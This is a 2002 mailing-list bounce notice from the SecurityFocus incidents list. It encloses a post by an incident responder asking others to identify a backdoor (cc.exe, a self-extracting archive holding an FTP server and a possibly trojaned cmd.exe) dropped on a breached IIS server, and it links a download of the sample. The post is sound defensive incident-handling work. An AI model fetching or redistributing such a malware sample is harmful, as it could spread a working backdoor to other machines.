Hi! This is the ezmlm program. I'm managing the
incidentssecurityfocus.com mailing list.

I'm working for my owner, who can be reached
at incidents-ownersecurityfocus.com.

Messages to you from the incidents mailing list seem to
have been bouncing. I've attached a copy of the first bounce
message I received.

If this message bounces too, I will send you a probe. If the probe bounces,
I will remove your address from the incidents mailing list,
without further notice.

I've kept a list of which messages from the incidents mailing list have
bounced from your address.

Copies of these messages may be in the archive.

To retrieve a set of messages 123-145 (a maximum of 100 per request),
send an empty message to:
   <incidents-get.123_145securityfocus.com>

To receive a subject and author list for the last 100 or so messages,
send an empty message to:
   <incidents-indexsecurityfocus.com>

Here are the message numbers:

   3679
   3690
   3681
   3686
   3688
   3689
   3685
   3692
   3680
   3691
   3687
   3684
   3682
   3683
   3698
   3694
   3697
   3693
   3695
   3696
   3699
   3700
   3702
   3701
   3703
   3704
   3705
   3706
   3708
   3707
   3711
   3709
   3710
   3712
   3713
   3714
   3715
   3716
   3717
   3718
   3719
   3720
   3721
   3722
   3723
   3724
   3725
   3726
   3727
   3729
   3728
   3730
   3732
   3731
   3733
   3734
   3735
   3737
   3736
   3738
   3739
   3740
   3741
   3742
   3743
   3744

--- Enclosed is a copy of the bounce message I received.

Return-Path: <>
Received: (qmail 31734 invoked from network); 11 Jul 2002 00:18:42 -0000
Received: from unknown (HELO securityfocus.com) (66.38.151.9)
  by lists.securityfocus.com with SMTP; 11 Jul 2002 00:18:42 -0000
Received: (qmail 13763 invoked by alias); 11 Jul 2002 00:15:05 -0000
Received: (qmail 13759 invoked from network); 11 Jul 2002 00:15:05 -0000

  by mail.securityfocus.com with SMTP; 11 Jul 2002 00:15:05 -0000

        id 5C51A17BFE; Wed, 10 Jul 2002 19:21:59 -0500 (CDT)
Date: Wed, 10 Jul 2002 19:21:59 -0500 (CDT)

Subject: Undelivered Mail Returned to Sender

MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;

This is a MIME-encapsulated message.

Content-Description: Notification
Content-Type: text/plain

I'm sorry to have to inform you that the message returned
below could not be delivered to one or more destinations.

For further assistance, please send mail to <postmaster>

If you do so, please include this problem report. You can
delete your own text from the message returned below.

                        The Postfix program

    /home/httpd/archives-mbox/current.mbox: error writing message: File too
    large

Content-Description: Delivery error report
Content-Type: message/delivery-status

Arrival-Date: Wed, 10 Jul 2002 19:21:59 -0500 (CDT)

Action: failed
Status: 5.0.0
Diagnostic-Code: X-Postfix; cannot append message to destination file
    /home/httpd/archives-mbox/current.mbox: error writing message: File too
    large

Content-Description: Undelivered Message
Content-Type: message/rfc822

Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com [66.38.151.27])


Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19])
        by outgoing.securityfocus.com (Postfix) with QMQP
        id DA140A3A47; Wed, 10 Jul 2002 16:46:50 -0600 (MDT)
Mailing-List: contact incidents-helpsecurityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <incidents.list-id.securityfocus.com>
List-Post: <mailto:incidentssecurityfocus.com>
List-Help: <mailto:incidents-helpsecurityfocus.com>
List-Unsubscribe: <mailto:incidents-unsubscribesecurityfocus.com>
List-Subscribe: <mailto:incidents-subscribesecurityfocus.com>
Delivered-To: mailing list incidentssecurityfocus.com
Delivered-To: moderator for incidentssecurityfocus.com
Received: (qmail 25799 invoked from network); 10 Jul 2002 21:54:19 -0000
From: "Matt Andreko" <mandrekoori.net>
To: <incidentssecurityfocus.com>
Subject: Can anyone identify this backdoor?
Date: Wed, 10 Jul 2002 16:58:06 -0500
Message-ID: <026601c2285c$df572dd0$173625d8ori.net>
MIME-Version: 1.0
Content-Type: text/plain;
        charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

Apparently over the holiday, one of my client's machines was broken
into. It was running Windows 2000 Pro, with IIS installed (webserver
only, no ftp,smtp..) Apparently the attacker got in through this. The
logs show some Unicode in the requests, so I'd bet that's it.

A file was deposited in the c:\winnt\system32\ folder named "cc.exe". I
have studied it a little bit, and it seems quite interesting. It's
actually a winrar self-executable file. Inside contains what I believe
a stripped down copy of serv-u ftp server, messages for that server, and
some other interesting tools. There's a cmd.exe file, which doesn't
match the size of the one in c:\winnt\system32, so it could be
backdoored.

I was basically wondering if anyone had seen anything like it, or could
identify it. I have put a copy up temporarily on my webserver at
http://www.criminalsmostly.com/~mandreko/cc.zip

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]